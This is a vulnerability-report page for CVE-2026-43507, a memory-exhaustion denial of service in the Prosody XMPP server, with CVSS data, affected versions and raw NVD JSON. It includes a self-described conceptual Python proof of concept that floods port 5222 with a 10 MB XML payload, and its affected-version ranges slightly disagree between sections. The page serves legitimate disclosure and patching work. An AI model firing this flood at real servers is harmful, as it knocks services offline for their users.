Security Vulnerability Report
中文
CVE-2026-43507 CVSS 5.3 MEDIUM

CVE-2026-43507

Published: 2026-05-01 15:16:53
Last Modified: 2026-05-01 17:09:18

Description

An issue was discovered in Prosody before 0.12.6 and 1.0.0 through 13.0.0 before 13.0.5. A Denial of Service can occur via memory exhaustion caused by XML parsing resource amplification from unauthenticated connections.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:* - VULNERABLE
Prosody < 0.12.6
Prosody >= 1.0.0, < 13.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket def send_malicious_xml(host, port=5222): try: # Connect to the Prosody server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Send malicious XML stream header to trigger resource amplification # Note: This is a conceptual PoC. Actual payload may vary based on specific parser behavior. payload = "<stream:stream xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>" payload += "<attack>" + "A" * 10000000 + "</attack>" # Large payload to exhaust memory s.send(payload.encode('utf-8')) print(f"[+] Payload sent to {host}:{port}") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_host = "192.168.1.10" send_malicious_xml(target_host)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43507", "sourceIdentifier": "[email protected]", "published": "2026-05-01T15:16:52.990", "lastModified": "2026-05-01T17:09:17.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Prosody before 0.12.6 and 1.0.0 through 13.0.0 before 13.0.5. A Denial of Service can occur via memory exhaustion caused by XML parsing resource amplification from unauthenticated connections."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.12.6", "matchCriteriaId": "B9387C8F-EE90-4F0C-9E40-BD3DAF571C74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "13.0.5", "matchCriteriaId": "F946C4BE-7151-45DA-A376-D1B2DC449A5C"}]}]}], "references": [{"url": "https://blog.unionium.org/ARTICLES/1.HTM", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://prosody.im/security/advisory_735dd9d3/", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/01/5", "source": "[email protected]", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}